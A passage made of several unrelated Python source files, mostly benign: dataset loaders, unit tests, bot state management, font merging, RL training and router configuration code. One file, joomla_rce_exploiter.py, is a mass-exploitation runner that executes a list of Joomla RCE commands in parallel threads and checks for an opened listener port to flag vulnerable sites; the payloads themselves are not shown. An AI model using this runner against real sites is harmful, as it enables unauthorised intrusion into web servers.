**kwargs: keyword arguments forwarded to super.
"""
super(Bc2gmCorpusConfig, self).__init__(**kwargs)
class Bc2gmCorpus(datasets.GeneratorBasedBuilder):
"""Bc2gmCorpus dataset."""
BUILDER_CONFIGS = [
Bc2gmCorpusConfig(name="bc2gm_corpus", version=datasets.Version("1.0.0"), description="bc2gm corpus"),
]
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{
"id": datasets.Value("string"),
"tokens": datasets.Sequence(datasets.Value("string")),
"ner_tags": datasets.Sequence(
datasets.features.ClassLabel(
names=[
"O",
"B-GENE",
"I-GENE",
]
)
),
}
),
supervised_keys=None,
homepage=_HOMEPAGE,
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
urls_to_download = {
"train": f"{_URL}{_TRAINING_FILE}",
"dev": f"{_URL}{_DEV_FILE}",
"test": f"{_URL}{_TEST_FILE}",
}
downloaded_files = dl_manager.download_and_extract(urls_to_download)
return [
datasets.SplitGenerator(name=datasets.Split.TRAIN, gen_kwargs={"filepath": downloaded_files["train"]}),
datasets.SplitGenerator(name=datasets.Split.VALIDATION, gen_kwargs={"filepath": downloaded_files["dev"]}),
datasets.SplitGenerator(name=datasets.Split.TEST, gen_kwargs={"filepath": downloaded_files["test"]}),
]
def _generate_examples(self, filepath):
logger.info("⏳ Generating examples from = %s", filepath)
with open(filepath, encoding="utf-8") as f:
guid = 0
tokens = []
ner_tags = []
for line in f:
if line == "" or line == "\n":
if tokens:
yield guid, {
"id": str(guid),
"tokens": tokens,
"ner_tags": ner_tags,
}
guid += 1
tokens = []
ner_tags = []
else:
# tokens are tab separated
splits = line.split("\t")
tokens.append(splits[0])
ner_tags.append(splits[1].rstrip())
# last example
yield guid, {
"id": str(guid),
"tokens": tokens,
"ner_tags": ner_tags,
}
|
rdkit/Chem/UnitTestChemSmarts.py | kazuyaujihara/rdkit | 1,609 | 12739425 | <reponame>kazuyaujihara/rdkit<gh_stars>1000+
# $Id$
#
# Copyright (C) 2003-2006 Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
"""basic unit testing code for the wrapper of the SMARTS matcher
"""
from rdkit import RDConfig
import unittest
import os.path
from rdkit import Chem
class TestCase(unittest.TestCase):
def setUp(self):
#print '\n%s: '%self.shortDescription(),
fName = os.path.join(RDConfig.RDCodeDir, 'Chem', 'test_data', 'quinone.mol')
self.m = Chem.MolFromMolFile(fName)
assert self.m.GetNumAtoms() == 8, 'bad nAtoms'
def testMatch(self):
" testing smarts match "
p = Chem.MolFromSmarts('CC(=O)C')
matches = self.m.GetSubstructMatches(p)
assert len(matches) == 2, 'bad UMapList: %s' % (str(res))
for match in matches:
assert len(match) == 4, 'bad match: %s' % (str(match))
def testOrder(self):
" testing atom order in smarts match "
p = Chem.MolFromSmarts('CC(=O)C')
matches = self.m.GetSubstructMatches(p)
m = matches[0]
atomList = [self.m.GetAtomWithIdx(x).GetSymbol() for x in m]
assert atomList == ['C', 'C', 'O', 'C'], 'bad atom ordering: %s' % str(atomList)
if __name__ == '__main__':
unittest.main()
|
utils_scripts/joomla_rce_exploiter.py | fakegit/google_explorer | 155 | 12739431 | """
Usage:
joomla_rce_exploiter.py --file=<arg>
joomla_rce_exploiter.py --help
joomla_rce_exploiter.py --version
Options:
-h --help Open help menu
-v --version Show version
Required options:
--file='arq' arq
"""
import threading
import os
import sys
import time
import commands
import Queue
from threading import Thread
from docopt import docopt, DocoptExit
tested = []
class JoomlaRceSpliter():
def listener(self, filename):
global tested
with open(filename, 'r') as f:
port = f.readline().split()[-1]
cmd = 'a=$(netstat -plnt 2>&1 | grep {0} -c); echo $a'.format(port)
kill = 'id=$(pgrep -f {0}); kill -9 $id'.format(filename)
while True:
s, o = commands.getstatusoutput(cmd)
if o == '0':
print '[+] \033[31mVulnerable!!\033[33m Joomla RCE woked..\033[39m\n'
print tested
os.system('id=$(pgrep -f vuln_joomla_2015_8562.txt); kill -9 $id')
sys.exit(0)
#def exploiter(self, filename):
# global cont
# cont=1
# with open(filename, 'r') as f:
# for target in f.readlines():
# os.system(target.rstrip())
# cont+=1
def exploiter(self, q):
global tested
while True:
try:
target = q.get()
tested.append(target)
os.system(target)
q.task_done()
except:
q.task_done()
if __name__ == '__main__':
arguments = docopt(__doc__, version="Joomla Spliter - Google Explorer - 2016")
filename = arguments['--file']
x = JoomlaRceSpliter()
Thread(target=x.listener, args=(filename,)).start()
results = [line.rstrip('\n') for line in open(filename)]
# My Queue
q = Queue.Queue(maxsize=0)
# Number of threads
num_threads = 10
for tgt in results:
q.put(tgt)
# My threads
print('[*] Starting evil threads =)...\n')
for i in range(num_threads):
worker = Thread(target=x.exploiter, args=(q,))
worker.setDaemon(True)
worker.start()
q.join()
#os.system('id=$(pgrep -f vuln_joomla_2015_8562.txt); kill -9 $id 2>&1 ')
|
libraries/botbuilder-core/botbuilder/core/bot_state.py | Fl4v/botbuilder-python | 388 | 12739446 | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from abc import abstractmethod
from copy import deepcopy
from typing import Callable, Dict, Union
from jsonpickle.pickler import Pickler
from botbuilder.core.state_property_accessor import StatePropertyAccessor
from .bot_assert import BotAssert
from .turn_context import TurnContext
from .storage import Storage
from .property_manager import PropertyManager
class CachedBotState:
"""
Internal cached bot state.
"""
def __init__(self, state: Dict[str, object] = None):
self.state = state if state is not None else {}
self.hash = self.compute_hash(state)
@property
def is_changed(self) -> bool:
return self.hash != self.compute_hash(self.state)
def compute_hash(self, obj: object) -> str:
return str(Pickler().flatten(obj))
class BotState(PropertyManager):
"""
Defines a state management object and automates the reading and writing of
associated state properties to a storage layer.
.. remarks::
Each state management object defines a scope for a storage layer.
State properties are created within a state management scope, and the Bot Framework
defines these scopes: :class:`ConversationState`, :class:`UserState`, and :class:`PrivateConversationState`.
You can define additional scopes for your bot.
"""
def __init__(self, storage: Storage, context_service_key: str):
"""
Initializes a new instance of the :class:`BotState` class.
:param storage: The storage layer this state management object will use to store and retrieve state
:type storage: :class:`bptbuilder.core.Storage`
:param context_service_key: The key for the state cache for this :class:`BotState`
:type context_service_key: str
.. remarks::
This constructor creates a state management object and associated scope. The object uses
the :param storage: to persist state property values and the :param context_service_key: to cache state
within the context for each turn.
:raises: It raises an argument null exception.
"""
self.state_key = "state"
self._storage = storage
self._context_service_key = context_service_key
def get_cached_state(self, turn_context: TurnContext):
"""
Gets the cached bot state instance that wraps the raw cached data for this "BotState"
from the turn context.
:param turn_context: The context object for this turn.
:type turn_context: :class:`TurnContext`
:return: The cached bot state instance.
"""
BotAssert.context_not_none(turn_context)
return turn_context.turn_state.get(self._context_service_key)
def create_property(self, name: str) -> StatePropertyAccessor:
"""
Creates a property definition and registers it with this :class:`BotState`.
:param name: The name of the property
:type name: str
:return: If successful, the state property accessor created
:rtype: :class:`StatePropertyAccessor`
"""
if not name:
raise TypeError("BotState.create_property(): name cannot be None or empty.")
return BotStatePropertyAccessor(self, name)
def get(self, turn_context: TurnContext) -> Dict[str, object]:
BotAssert.context_not_none(turn_context)
cached = self.get_cached_state(turn_context)
return getattr(cached, "state", None)
async def load(self, turn_context: TurnContext, force: bool = False) -> None:
"""
Reads the current state object and caches it in the context object for this turn.
:param turn_context: The context object for this turn
:type turn_context: :class:`TurnContext`
:param force: Optional, true to bypass the cache
:type force: bool
"""
BotAssert.context_not_none(turn_context)
cached_state = self.get_cached_state(turn_context)
storage_key = self.get_storage_key(turn_context)
if force or not cached_state or not cached_state.state:
items = await self._storage.read([storage_key])
val = items.get(storage_key)
turn_context.turn_state[self._context_service_key] = CachedBotState(val)
async def save_changes(
self, turn_context: TurnContext, force: bool = False
) -> None:
"""
Saves the state cached in the current context for this turn.
If the state has changed, it saves the state cached in the current context for this turn.
:param turn_context: The context object for this turn
:type turn_context: :class:`TurnContext`
:param force: Optional, true to save state to storage whether or not there are changes
:type force: bool
"""
BotAssert.context_not_none(turn_context)
cached_state = self.get_cached_state(turn_context)
if force or (cached_state is not None and cached_state.is_changed):
storage_key = self.get_storage_key(turn_context)
changes: Dict[str, object] = {storage_key: cached_state.state}
await self._storage.write(changes)
cached_state.hash = cached_state.compute_hash(cached_state.state)
async def clear_state(self, turn_context: TurnContext):
"""
Clears any state currently stored in this state scope.
:param turn_context: The context object for this turn
:type turn_context: :class:`TurnContext`
:return: None
.. remarks::
This function must be called in order for the cleared state to be persisted to the underlying store.
"""
BotAssert.context_not_none(turn_context)
# Explicitly setting the hash will mean IsChanged is always true. And that will force a Save.
cache_value = CachedBotState()
cache_value.hash = ""
turn_context.turn_state[self._context_service_key] = cache_value
async def delete(self, turn_context: TurnContext) -> None:
"""
Deletes any state currently stored in this state scope.
:param turn_context: The context object for this turn
:type turn_context: :class:`TurnContext`
:return: None
"""
BotAssert.context_not_none(turn_context)
turn_context.turn_state.pop(self._context_service_key)
storage_key = self.get_storage_key(turn_context)
await self._storage.delete({storage_key})
@abstractmethod
def get_storage_key(self, turn_context: TurnContext) -> str:
raise NotImplementedError()
async def get_property_value(self, turn_context: TurnContext, property_name: str):
"""
Gets the value of the specified property in the turn context.
:param turn_context: The context object for this turn
:type turn_context: :class:`TurnContext`
:param property_name: The property name
:type property_name: str
:return: The value of the property
"""
BotAssert.context_not_none(turn_context)
if not property_name:
raise TypeError(
"BotState.get_property_value(): property_name cannot be None."
)
cached_state = self.get_cached_state(turn_context)
# if there is no value, this will throw, to signal to IPropertyAccesor that a default value should be computed
# This allows this to work with value types
return cached_state.state[property_name]
async def delete_property_value(
self, turn_context: TurnContext, property_name: str
) -> None:
"""
Deletes a property from the state cache in the turn context.
:param turn_context: The context object for this turn
:type turn_context: :TurnContext`
:param property_name: The name of the property to delete
:type property_name: str
:return: None
"""
BotAssert.context_not_none(turn_context)
if not property_name:
raise TypeError("BotState.delete_property(): property_name cannot be None.")
cached_state = self.get_cached_state(turn_context)
del cached_state.state[property_name]
async def set_property_value(
self, turn_context: TurnContext, property_name: str, value: object
) -> None:
"""
Sets a property to the specified value in the turn context.
:param turn_context: The context object for this turn
:type turn_context: :class:`TurnContext`
:param property_name: The property name
:type property_name: str
:param value: The value to assign to the property
:type value: Object
:return: None
"""
BotAssert.context_not_none(turn_context)
if not property_name:
raise TypeError("BotState.delete_property(): property_name cannot be None.")
cached_state = self.get_cached_state(turn_context)
cached_state.state[property_name] = value
class BotStatePropertyAccessor(StatePropertyAccessor):
"""
Defines methods for accessing a state property created in a :class:`BotState` object.
"""
def __init__(self, bot_state: BotState, name: str):
"""
Initializes a new instance of the :class:`BotStatePropertyAccessor` class.
:param bot_state: The state object to access
:type bot_state: :class:`BotState`
:param name: The name of the state property to access
:type name: str
"""
self._bot_state = bot_state
self._name = name
@property
def name(self) -> str:
"""
The name of the property.
"""
return self._name
async def delete(self, turn_context: TurnContext) -> None:
"""
Deletes the property.
:param turn_context: The context object for this turn
:type turn_context: :class:`TurnContext`
"""
await self._bot_state.load(turn_context, False)
await self._bot_state.delete_property_value(turn_context, self._name)
async def get(
self,
turn_context: TurnContext,
default_value_or_factory: Union[Callable, object] = None,
) -> object:
"""
Gets the property value.
:param turn_context: The context object for this turn
:type turn_context: :class:`TurnContext`
:param default_value_or_factory: Defines the default value for the property
"""
await self._bot_state.load(turn_context, False)
try:
result = await self._bot_state.get_property_value(turn_context, self._name)
return result
except:
# ask for default value from factory
if not default_value_or_factory:
return None
result = (
default_value_or_factory()
if callable(default_value_or_factory)
else deepcopy(default_value_or_factory)
)
# save default value for any further calls
await self.set(turn_context, result)
return result
async def set(self, turn_context: TurnContext, value: object) -> None:
"""
Sets the property value.
:param turn_context: The context object for this turn
:type turn_context: :class:`TurnContext`
:param value: The value to assign to the property
"""
await self._bot_state.load(turn_context, False)
await self._bot_state.set_property_value(turn_context, self._name, value)
|
src/hypercorn/__init__.py | ai-mocap/hypercorn | 264 | 12739451 | from __future__ import annotations
from .__about__ import __version__
from .config import Config
__all__ = ("__version__", "Config")
|
Torch-1 DDPG/Torch-1 DDPG CPU/main.py | summerRainn/DeepLearningNotes | 345 | 12739454 | """@author: Young
@license: (C) Copyright 2013-2017
@contact: <EMAIL>
@file: main.py
@time: 2018/1/17 10:02
"""
import gc
import gym
from agent.agent import Agent
MAX_EPISODES = 5000
env = gym.make('BipedalWalker-v2')
state_size = env.observation_space.shape[0]
action_size = env.action_space.shape[0]
agent = Agent(state_size, action_size)
state = env.reset()
for _ in range(int(1e3)):
action = agent.get_exploration_policy(state)
next_state, reward, done, info = env.step(action)
agent.append(state, action, reward, done, next_state)
state = next_state
if done:
state = env.reset()
for _ep in range(MAX_EPISODES):
state = env.reset()
count = 0
while True:
count += 1
# env.render()
action = agent.get_exploration_policy(state)
next_state, reward, done, info = env.step(action)
agent.append(state, action, reward, done, next_state)
state = next_state
agent.optimize()
if done:
state = env.reset()
break
gc.collect()
if _ep % 100 == 0:
print("{} - score: {}".format(_ep, count))
agent.save_models(_ep)
|
toolbox/data.py | henrytseng/srcnn | 125 | 12739459 | from functools import partial
import numpy as np
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import load_img
from toolbox.image import bicubic_rescale
from toolbox.image import modcrop
from toolbox.paths import data_dir
def load_set(name, lr_sub_size=11, lr_sub_stride=5, scale=3):
hr_sub_size = lr_sub_size * scale
hr_sub_stride = lr_sub_stride * scale
lr_gen_sub = partial(generate_sub_images, size=lr_sub_size,
stride=lr_sub_stride)
hr_gen_sub = partial(generate_sub_images, size=hr_sub_size,
stride=hr_sub_stride)
lr_sub_arrays = []
hr_sub_arrays = []
for path in (data_dir / name).glob('*'):
lr_image, hr_image = load_image_pair(str(path), scale=scale)
lr_sub_arrays += [img_to_array(img) for img in lr_gen_sub(lr_image)]
hr_sub_arrays += [img_to_array(img) for img in hr_gen_sub(hr_image)]
x = np.stack(lr_sub_arrays)
y = np.stack(hr_sub_arrays)
return x, y
def load_image_pair(path, scale=3):
image = load_img(path)
image = image.convert('YCbCr')
hr_image = modcrop(image, scale)
lr_image = bicubic_rescale(hr_image, 1 / scale)
return lr_image, hr_image
def generate_sub_images(image, size, stride):
for i in range(0, image.size[0] - size + 1, stride):
for j in range(0, image.size[1] - size + 1, stride):
yield image.crop([i, j, i + size, j + size])
|
crabageprediction/venv/Lib/site-packages/fontTools/merge/base.py | 13rianlucero/CrabAgePrediction | 2,705 | 12739467 | # Copyright 2013 Google, Inc. All Rights Reserved.
#
# Google Author(s): <NAME>, <NAME>
from fontTools.ttLib.tables.DefaultTable import DefaultTable
import logging
log = logging.getLogger("fontTools.merge")
def add_method(*clazzes, **kwargs):
"""Returns a decorator function that adds a new method to one or
more classes."""
allowDefault = kwargs.get('allowDefaultTable', False)
def wrapper(method):
done = []
for clazz in clazzes:
if clazz in done: continue # Support multiple names of a clazz
done.append(clazz)
assert allowDefault or clazz != DefaultTable, 'Oops, table class not found.'
assert method.__name__ not in clazz.__dict__, \
"Oops, class '%s' has method '%s'." % (clazz.__name__, method.__name__)
setattr(clazz, method.__name__, method)
return None
return wrapper
def mergeObjects(lst):
lst = [item for item in lst if item is not NotImplemented]
if not lst:
return NotImplemented
lst = [item for item in lst if item is not None]
if not lst:
return None
clazz = lst[0].__class__
assert all(type(item) == clazz for item in lst), lst
logic = clazz.mergeMap
returnTable = clazz()
returnDict = {}
allKeys = set.union(set(), *(vars(table).keys() for table in lst))
for key in allKeys:
try:
mergeLogic = logic[key]
except KeyError:
try:
mergeLogic = logic['*']
except KeyError:
raise Exception("Don't know how to merge key %s of class %s" %
(key, clazz.__name__))
if mergeLogic is NotImplemented:
continue
value = mergeLogic(getattr(table, key, NotImplemented) for table in lst)
if value is not NotImplemented:
returnDict[key] = value
returnTable.__dict__ = returnDict
return returnTable
@add_method(DefaultTable, allowDefaultTable=True)
def merge(self, m, tables):
if not hasattr(self, 'mergeMap'):
log.info("Don't know how to merge '%s'.", self.tableTag)
return NotImplemented
logic = self.mergeMap
if isinstance(logic, dict):
return m.mergeObjects(self, self.mergeMap, tables)
else:
return logic(tables)
|
ironic/tests/unit/api/controllers/v1/test_event.py | yanndegat/ironic | 350 | 12739470 | <gh_stars>100-1000
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests for the API /events methods.
"""
from http import client as http_client
from unittest import mock
from keystonemiddleware import auth_token
from oslo_config import cfg
from ironic.api.controllers import base as api_base
from ironic.api.controllers.v1 import event
from ironic.api.controllers.v1 import versions
from ironic.common import args
from ironic.common import exception
from ironic.tests import base as test_base
from ironic.tests.unit.api import base as test_api_base
def get_fake_port_event():
return {'event': 'network.bind_port',
'port_id': '11111111-aaaa-bbbb-cccc-555555555555',
'mac_address': 'de:ad:ca:fe:ba:be',
'status': 'ACTIVE',
'device_id': '22222222-aaaa-bbbb-cccc-555555555555',
'binding:host_id': '22222222-aaaa-bbbb-cccc-555555555555',
'binding:vnic_type': 'baremetal'}
class TestEventValidator(test_base.TestCase):
def setUp(self):
super(TestEventValidator, self).setUp()
self.v_event = event.NETWORK_EVENT_VALIDATOR
self.v_events = args.schema(event.EVENTS_SCHEMA)
def test_simple_event_type(self):
self.v_events('body', {'events': [get_fake_port_event()]})
def test_invalid_event_type(self):
value = {'events': [{'event': 'invalid.event'}]}
self.assertRaisesRegex(exception.Invalid,
"Schema error for body: "
"'invalid.event' is not one of",
self.v_events, 'body', value)
def test_event_missing_madatory_field(self):
value = {'invalid': 'invalid'}
self.assertRaisesRegex(exception.Invalid,
"Schema error for event: "
"'event' is a required property",
self.v_event, 'event', value)
def test_invalid_mac_network_port_event(self):
value = {'event': 'network.bind_port',
'port_id': '11111111-aaaa-bbbb-cccc-555555555555',
'mac_address': 'INVALID_MAC_ADDRESS',
'status': 'ACTIVE',
'device_id': '22222222-aaaa-bbbb-cccc-555555555555',
'binding:host_id': '22222222-aaaa-bbbb-cccc-555555555555',
'binding:vnic_type': 'baremetal'
}
self.assertRaisesRegex(exception.Invalid,
'Expected valid MAC address for mac_address: '
'INVALID_MAC_ADDRESS',
self.v_event, 'event', value)
def test_missing_mandatory_fields_network_port_event(self):
value = {'event': 'network.bind_port',
'device_id': '22222222-aaaa-bbbb-cccc-555555555555',
'binding:host_id': '22222222-aaaa-bbbb-cccc-555555555555',
'binding:vnic_type': 'baremetal'
}
self.assertRaisesRegex(exception.Invalid,
"Schema error for event: "
"'port_id' is a required property",
self.v_event, 'event', value)
class TestPost(test_api_base.BaseApiTest):
def setUp(self):
super(TestPost, self).setUp()
self.headers = {api_base.Version.string: str(
versions.max_version_string())}
def test_events(self):
events_dict = {'events': [get_fake_port_event()]}
response = self.post_json('/events', events_dict, headers=self.headers)
self.assertEqual(http_client.NO_CONTENT, response.status_int)
def test_multiple_events(self):
events_dict = {'events': [get_fake_port_event(),
get_fake_port_event(),
get_fake_port_event()]}
response = self.post_json('/events', events_dict, headers=self.headers)
self.assertEqual(http_client.NO_CONTENT, response.status_int)
def test_events_does_not_contain_event(self):
events_dict = {'events': [{'INVALID': 'fake.event'}]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_events_invalid_event(self):
events_dict = {'events': [{'event': 'invalid.event'}]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_network_unknown_event_property(self):
events_dict = {'events': [{'event': 'network.unbind_port',
'UNKNOWN': 'EVENT_PROPERTY'}]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_network_bind_port_events(self):
events_dict = {'events': [get_fake_port_event()]}
response = self.post_json('/events', events_dict, headers=self.headers)
self.assertEqual(http_client.NO_CONTENT, response.status_int)
def test_network_unbind_port_events(self):
events_dict = {'events': [get_fake_port_event()]}
events_dict['events'][0].update({'event': 'network.unbind_port'})
response = self.post_json('/events', events_dict, headers=self.headers)
self.assertEqual(http_client.NO_CONTENT, response.status_int)
def test_network_delete_port_events(self):
events_dict = {'events': [get_fake_port_event()]}
events_dict['events'][0].update({'event': 'network.delete_port'})
response = self.post_json('/events', events_dict, headers=self.headers)
self.assertEqual(http_client.NO_CONTENT, response.status_int)
def test_network_port_event_invalid_mac_address(self):
port_evt = get_fake_port_event()
port_evt.update({'mac_address': 'INVALID_MAC_ADDRESS'})
events_dict = {'events': [port_evt]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_network_port_event_invalid_device_id(self):
port_evt = get_fake_port_event()
port_evt.update({'device_id': 'DEVICE_ID_SHOULD_BE_UUID'})
events_dict = {'events': [port_evt]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_network_port_event_invalid_port_id(self):
port_evt = get_fake_port_event()
port_evt.update({'port_id': 'PORT_ID_SHOULD_BE_UUID'})
events_dict = {'events': [port_evt]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_network_port_event_invalid_status(self):
port_evt = get_fake_port_event()
port_evt.update({'status': ['status', 'SHOULD', 'BE', 'TEXT']})
events_dict = {'events': [port_evt]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_network_port_event_invalid_binding_vnic_type(self):
port_evt = get_fake_port_event()
port_evt.update({'binding:vnic_type': ['binding:vnic_type', 'SHOULD',
'BE', 'TEXT']})
events_dict = {'events': [port_evt]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_network_port_event_invalid_binding_host_id(self):
port_evt = get_fake_port_event()
port_evt.update({'binding:host_id': ['binding:host_id', 'IS',
'NODE_UUID', 'IN', 'IRONIC']})
events_dict = {'events': [port_evt]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_events_unsupported_api_version(self):
headers = {api_base.Version.string: '1.50'}
events_dict = {'events': [get_fake_port_event()]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=headers)
self.assertEqual(http_client.NOT_FOUND, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
@mock.patch.object(auth_token.AuthProtocol, 'process_request',
lambda *_: None)
class TestPostRBAC(TestPost):
"""Test class to execute the Event post tests with RBAC enforcement."""
def setUp(self):
super(TestPostRBAC, self).setUp()
cfg.CONF.set_override('enforce_scope', True, group='oslo_policy')
cfg.CONF.set_override('enforce_new_defaults', True,
group='oslo_policy')
cfg.CONF.set_override('auth_strategy', 'keystone')
# Headers required for this to pass in system scope restricted
# authentication, as our default for api tests is noauth.
self.headers = {
api_base.Version.string: str(
versions.max_version_string()),
'X-Auth-Token': '<PASSWORD>',
'X-Roles': 'admin',
'OpenStack-System-Scope': 'all',
}
|
pypy/module/_lsprof/test/test_cprofile.py | nanjekyejoannah/pypy | 333 | 12739482 | <gh_stars>100-1000
class AppTestCProfile(object):
spaceconfig = {
"usemodules": ['_lsprof', 'time'],
}
def setup_class(cls):
cls.w_file = cls.space.wrap(__file__)
def test_repr(self):
import _lsprof
assert repr(_lsprof.Profiler) == "<type '_lsprof.Profiler'>"
def test_builtins(self):
import _lsprof
prof = _lsprof.Profiler()
lst = []
prof.enable()
lst.append(len(lst))
prof.disable()
stats = prof.getstats()
expected = (
"<len>",
"<method 'append' of 'list' objects>",
"<method 'disable' of '_lsprof.Profiler' objects>",
)
for entry in stats:
assert entry.code in expected
def test_builtins_callers(self):
import _lsprof
prof = _lsprof.Profiler(subcalls=True)
lst = []
def f1():
lst.append(len(lst))
prof.enable(subcalls=True)
f1()
prof.disable()
stats = prof.getstats()
expected = (
"<len>",
"<method 'append' of 'list' objects>",
)
by_id = set()
for entry in stats:
if entry.code == f1.__code__:
assert len(entry.calls) == 2
for subentry in entry.calls:
assert subentry.code in expected
by_id.add(id(subentry.code))
elif entry.code in expected:
by_id.add(id(entry.code))
# :-( cProfile.py relies on the id() of the strings...
assert len(by_id) == len(expected)
def test_direct(self):
import _lsprof
def getticks():
return len(ticks)
prof = _lsprof.Profiler(getticks, 0.25, True, False)
ticks = []
def bar(m):
ticks.append(1)
if m == 1:
foo(42)
ticks.append(1)
def spam(m):
bar(m)
def foo(n):
bar(n)
ticks.append(1)
bar(n+1)
ticks.append(1)
spam(n+2)
prof.enable()
foo(0)
prof.disable()
assert len(ticks) == 16
stats = prof.getstats()
entries = {}
for entry in stats:
assert hasattr(entry.code, 'co_name')
entries[entry.code.co_name] = entry
efoo = entries['foo']
assert efoo.callcount == 2
assert efoo.reccallcount == 1
assert efoo.inlinetime == 1.0
assert efoo.totaltime == 4.0
assert len(efoo.calls) == 2
ebar = entries['bar']
assert ebar.callcount == 6
assert ebar.reccallcount == 3
assert ebar.inlinetime == 3.0
assert ebar.totaltime == 3.5
assert len(ebar.calls) == 1
espam = entries['spam']
assert espam.callcount == 2
assert espam.reccallcount == 0
assert espam.inlinetime == 0.0
assert espam.totaltime == 1.0
assert len(espam.calls) == 1
foo2spam, foo2bar = efoo.calls
if foo2bar.code.co_name == 'spam':
foo2bar, foo2spam = foo2spam, foo2bar
assert foo2bar.code.co_name == 'bar'
assert foo2bar.callcount == 4
assert foo2bar.reccallcount == 2
assert foo2bar.inlinetime == 2.0
assert foo2bar.totaltime == 3.0
assert foo2spam.code.co_name == 'spam'
assert foo2spam.callcount == 2
assert foo2spam.reccallcount == 0
assert foo2spam.inlinetime == 0.0
assert foo2spam.totaltime == 1.0
bar2foo, = ebar.calls
assert bar2foo.code.co_name == 'foo'
assert bar2foo.callcount == 1
assert bar2foo.reccallcount == 0
assert bar2foo.inlinetime == 0.5
assert bar2foo.totaltime == 2.0
spam2bar, = espam.calls
assert spam2bar.code.co_name == 'bar'
assert spam2bar.callcount == 2
assert spam2bar.reccallcount == 0
assert spam2bar.inlinetime == 1.0
assert spam2bar.totaltime == 1.0
def test_scale_of_result(self):
import _lsprof, time
prof = _lsprof.Profiler()
def foo(n):
t = time.time()
while abs(t - time.time()) < 1.0:
pass # busy-wait for 1 second
def bar(n):
foo(n)
prof.enable()
bar(0)
prof.disable()
stats = prof.getstats()
entries = {}
for entry in stats:
entries[entry.code] = entry
efoo = entries[foo.__code__]
ebar = entries[bar.__code__]
assert 0.9 < efoo.totaltime < 2.9
# --- cannot test .inlinetime, because it does not include
# --- the time spent doing the call to time.time()
#assert 0.9 < efoo.inlinetime < 2.9
for subentry in ebar.calls:
assert 0.9 < subentry.totaltime < 2.9
#assert 0.9 < subentry.inlinetime < 2.9
def test_builtin_exception(self):
import math
import _lsprof
prof = _lsprof.Profiler()
prof.enable()
try:
math.sqrt("a")
except TypeError:
pass
prof.disable()
stats = prof.getstats()
assert len(stats) == 2
|
devices/management/commands/render_configuration.py | maznu/peering-manager | 127 | 12739485 | <reponame>maznu/peering-manager<gh_stars>100-1000
from argparse import FileType
from sys import stdin, stdout
from django.core.management.base import BaseCommand
from devices.models import Configuration
from peering.models import Router
class Command(BaseCommand):
help = "Render the configurations of routers."
def add_arguments(self, parser):
parser.add_argument(
"--limit",
nargs="?",
help="Limit the configuration to the given set of routers (comma separated).",
)
parser.add_argument(
"--input",
nargs="?",
type=FileType("r"),
default=stdin,
help="File to read the template from (default to stdin).",
)
parser.add_argument(
"--output",
nargs="?",
type=FileType("w"),
default=stdout,
help="File to write the configuration to (default to stdout).",
)
parser.add_argument(
"--trim",
action="store_true",
help="Remove new line after tag (keep them by default).",
)
parser.add_argument(
"--lstrip",
action="store_true",
help="Strip whitespaces before block (keep them by default).",
)
def handle(self, *args, **options):
if options["verbosity"] >= 2:
self.stdout.write("[*] Loading template")
t = Configuration(
name="tmp",
template=options["input"].read(),
jinja2_trim=options["trim"],
jinja2_lstrip=options["lstrip"],
)
routers = Router.objects.all()
if options["limit"]:
routers = routers.filter(hostname__in=options["limit"].split(","))
self.stdout.write("[*] Rendering configurations")
for r in routers:
if options["verbosity"] >= 2:
self.stdout.write(f" - Rendering {r.hostname} configuration")
r.configuration_template = t
configuration = r.generate_configuration()
self.stdout.write(configuration)
|
tests/test_handler.py | al3pht/cloud-custodian | 2,415 | 12739537 | # Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
import json
import logging
import mock
import os
from .common import BaseTest
from c7n.exceptions import PolicyExecutionError
from c7n.policy import Policy
from c7n import handler
class HandleTest(BaseTest):
def test_init_config_exec_option_merge(self):
